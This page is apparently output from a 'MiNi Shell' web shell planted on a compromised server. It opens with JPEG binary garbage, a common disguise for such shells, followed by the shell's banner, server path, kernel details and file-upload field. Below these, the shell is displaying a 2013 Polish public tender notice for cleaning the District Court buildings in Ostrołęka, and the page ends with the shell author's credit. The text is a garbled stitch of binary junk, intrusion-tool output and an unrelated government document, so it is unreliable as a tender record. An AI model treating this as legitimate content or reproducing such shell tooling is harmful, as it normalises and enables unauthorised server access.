JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131204/501024-N-2013.html

<p class="kh_header"><b>Ostrołęka: Usługa polegającą na sprzątaniu pomieszczeń budynkach Sądu Rejonowego w Ostrołęce przy ul. Mazowieckiej 3 i Placu Gen. J. Bema 10 oraz terenów posesji przy budynkach i przyległych chodnikach</b><br>
<b>Numer ogłoszenia: 501024 - 2013; data zamieszczenia: 04.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy , ul. Mazowiecka 3, 07-410 Ostrołęka, woj. mazowieckie, tel. 29 765 44 00, faks 29 765 44 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostroleka.sr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegającą na sprzątaniu pomieszczeń budynkach Sądu Rejonowego w Ostrołęce przy ul. Mazowieckiej 3 i Placu Gen. J. Bema 10 oraz terenów posesji przy budynkach i przyległych chodnikach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie usługi polegającej na sprzątaniu i utrzymania w czystości:
1.pomieszczeń i ciągów komunikacyjnych, wewnętrznych obiektu Sądu Rejonowego w Ostrołęce zlokalizowanego w Ostrołęce przy ul. Mazowieckiej 3;
2.pomieszczeń i ciągów komunikacyjnych, wewnętrznych obiektu Sądu Rejonowego w Ostrołęce zlokalizowanego w Ostrołęce przy Placu Gen. J.Bema 10;
3.elementów zagospodarowania terenu zlokalizowanych przy/wokół obiektu Sądu Rejonowego w Ostrołęce przy ul. Mazowieckiej 3 i Pl. Gen J.Bema 10.

Wykonanie usługi polegającej na sprzątaniu i utrzymania w czystości: 1. pomieszczeń i ciągów komunikacyjnych, wewnętrznych obiektu Sądu Rejonowego w Ostrołęce zlokalizowanego w Ostrołęce przy ul. Mazowieckiej 3; 2. pomieszczeń i ciągów komunikacyjnych, wewnętrznych obiektu Sądu Rejonowego w Ostrołęce zlokalizowanego w Ostrołęce przy Placu gen. J.Bema 10; 3. elementów zagospodarowania terenu zlokalizowanych przy/wokół obiektu Sądu Rejonowego w Ostrołęce przy ul. Mazowieckiej 3 i Pl. gen J.Bema 10. Parametry techniczne budynku przy ul. Mazowieckiej 3: 1) Kubatura obiektu: 12.468,70 m3; 2) Powierzchnia zabudowy:1.058,00 m2; 3) Powierzchnia użytkowa: .319,80 m2; a) w tym: - piwnica budynku 692,40 m2; - parter budynku 874,20 m2; - pierwsze piętro budynku 826,61 m2; - drugie piętro budynku 628,29 m2; - trzecie piętro budynku 298,30 m2; b) w tym powierzchnia: - biurowa 1.180,53 m2; - komunikacyjna 619,07 m2; - klatek schodowych115,90 m2; -pom. sanitarnych 113,10 m2; -pom. socjalnych 38,00 m2; -sal rozpraw 473,60 m2; -sali konferencyjnej 44,40 m2; -serwerowni 58,10 m2; -kancelarii tajnej 13,50 m2; -kasy 17,80 m2; -magazynów dowodów rzeczowych 39,00 m2; -archiwów 356,10 m2; -garażowa 51,70 m2; -techniczno-gospodarcza 199,00 m2; c) w tym rodzaj posadzki: -gres, terrakota 2.055,22 m2; -wykładzina dywanowa 1.220,18 m2; -wykładzina antyelektrostatyczna 44,40 m2; 4) Liczba pracowników wraz z osobami zatrudnionymi na umowę-zlecenie 88; 5) Przeciętna liczba interesantów dziennie ok. 200; 6) Ilość pojemników na mydło w płynie 19; 7) Ilość pojemników na papier toaletowy 25; 8) Ilość pojemników na ręczniki papierowe 19; 9) Liczba koszy na śmieci 160; 10) Ilość pomieszczeń sanitarnych 19; - w tym 25 kabin sanitarnych 11) Powierzchnia glazury w pomieszczeniach sanitarnych 528,72 m2; 12) Powierzchnia balustrad szklonych 51,06 m2; 13) Powierzchnia przyległych chodników 860 m2; 14) Powierzchnia otworów okiennych i otworów drzwiowych aluminiowych a) w tym wewnętrznych: -otwieranych 54,12 m2; -nieotwieranych /w tym winda/ 34,20 m2; b) w tym zewnętrznych: -otwieranych 380,91 m2; -nieotwieranych --- m2; c) w tym otworów drzwiowych aluminiowych 64,47 m2; Parametry techniczne budynku przy Placu Gen. J. Bema 10: 1) Kubatura obiektu: 1.920,65 m3; 2) Powierzchnia zabudowy: 1.058,00 m2; 3) Powierzchnia użytkowa: 434,60 m2; a) w tym: -piwnica budynku 82,20 m2; -parter budynku 119,50 m2; -pierwsze piętro budynku 113,80 m2; -drugie piętro budynku 119,10 m2; b) w tym powierzchnia: -biurowa 138,18 m2; -komunikacyjna 77,10 m2; -klatek schodowych 55,92 m2; -pom. sanitarnych 12,70 m2; -pom. socjalnych 4,40 m2; -sal rozpraw 54,20 m2; -serwerowni 9,90 m2; -archiwów 82,20 m2; c) w tym rodzaj posadzki: -gres, terrakota 281,52 m2; -wykładzina dywanowa 153,08 m2; 4) Liczba pracowników wraz z osobami zatrudnionymi na umowę-zlecenie 18; 5) Przeciętna liczba interesantów dziennie ok. 40; 6) Ilość pojemników na mydło w płynie 5; 7) Ilość pojemników na papier toaletowy 4; 8) Ilość pojemników na ręczniki papierowe 5; 9) Liczba koszy na śmieci 50; 10) Ilość pomieszczeń sanitarnych 4; 11) Powierzchnia glazury w pomieszczeniach sanitarnych 47 m2; 12) Powierzchnia przyległych chodników 135 m2; 13) Powierzchnia otworów okiennych i otworów drzwiowych aluminiowych w tym a) zewnętrznych: -otwieranych 60,70 m2; -nieotwieranych 9,00 m2; b) otworów drzwiowych aluminiowych 15 m2;..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.92.00-4, 90.91.40.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości 3.000,00 zł (słownie: trzy tysiące złotych) w jednej lub kilku następujących formach:a)pieniądzu, b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,c)gwarancjach bankowych, d)gwarancjach ubezpieczeniowych, e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z  dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (test jedn. Dz. U. z 2007r. nr 42, poz. 275).2.Wadium należy wnieść przed upływem terminu składania ofert.3.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego prowadzony w Bank Gospodarstwa Krajowego Oddział w Warszawie numer rachunku  25 1130 1017 0020 1199 0820 0003. Na przelewie należy umieścić informację: Wadium  ZP.6.2013. Za datę wniesienia wadium uznaje się datę wpływu środków pieniężnych na rachunek bankowy Zamawiającego.4.Wadium wnoszone w formie poręczeń bankowych, gwarancji bankowych, gwarancji ubezpieczeniowych, poręczeń udzielanych przez podmioty, o których mowa w art. 6 b ust.  5 pkt  2 ustawy z  dnia 09 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości należy dołączyć do oferty.5.Wadium wnoszone w formie poręczeń bankowych, gwarancji bankowych, gwarancji ubezpieczeniowych, poręczeń udzielanych przez podmioty, o których mowa w art. 6 b ust.  5 pkt  2 ustawy z  dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości winno zawierać:a)wskazanie gwaranta lub poręczyciela (nazwa podmiotu udzielającego gwarancji lub poręczenia),b)wskazanie beneficjenta (Sąd Rejonowy w Ostrołęce),c)określenie terminu obowiązywania gwarancji lub poręczenia (musi obejmować okres związania ofertą),d)określenie kwoty poręczenia lub gwarancji (musi być równa kwocie wadium),e)gwarantować wypłatę należności w sposób nieodwołalny, bezwarunkowy i na każde żądanie,f)przyczyny zatrzymania wadium przez Zamawiającego, określone w pkt. 11 niniejszego rozdziału.6.Wykonawca, który nie zabezpieczy oferty wymaganą formą wadium zostanie wykluczony z postępowania.7.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt.12.8.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.9.Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.10.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z  umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.11.Zamawiający zatrzymuje wadium wraz odsetkami, jeżeli Wykonawca, którego oferta została wybrana:1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w  ofercie,2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, ustawy PZP nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy - wg wzoru stanowiącego zał. nr 2 do SIWZ.
 
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w  postępowaniu, wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych lub wykonywanych w okresie ostatnich trzech lat, licząc od terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 2 usług w budynkach użyteczności publicznej o wartości nie mniejszej niż 100.000,00 zł każda, z  podaniem ich wartości, dat wykonania zamówienia i odbiorców wraz z  dokumentami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie - wg wzoru stanowiącego zał. nr 4 do SIWZ. 

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w  postępowaniu, wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy - wg wzoru stanowiącego zał. nr 2 do SIWZ.
 
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w  postępowaniu, wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o dysponowaniu co najmniej 6 osobami, wyznaczonymi do realizacji usługi, z których każda posiada wynikające z jednego kontraktu co najmniej 6 - miesięczne doświadczenie (staż pracy) polegające na sprzątaniu w obiektach użyteczności publicznej, nabyte w ciągu ostatnich trzech lat przed upływem terminu składania ofert - wg wzoru stanowiącego zał. nr 5 do SIWZ. 

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w  postępowaniu, wyszczególnionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ubezpieczenie od odpowiedzialności cywilnej, w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia, na sumę ubezpieczenia nie mniejszą niż 100.000zł. (kserokopia potwierdzona za zgodność z oryginałem). 

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w  postępowaniu, wyszczególnionych w SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy

2.Pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	zmiana osób, przy pomocy, których Wykonawca realizuje przedmiot umowy na inne, posiadające odpowiednie, aktualne badania lekarskie oraz aktualne szkolenia z BHP, jakie wymagane były w SIWZ; 
b)	zmiana podwykonawcy przy pomocy, którego Wykonawca realizuje przedmiot umowy na innego legitymującego się takimi samymi kwalifikacjami/doświadczeniem zawodowym po uprzedniej akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostroleka.sr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejnowy, ul. Mazowiecka 3, 07-410 Ostrołęce, parter, pokój nr A010..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 10:00, miejsce: siedzibia Zamawiającego: Ostrołęka, ul. Mazowiecka 3, parter, Punkt Obsługi Interesantów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com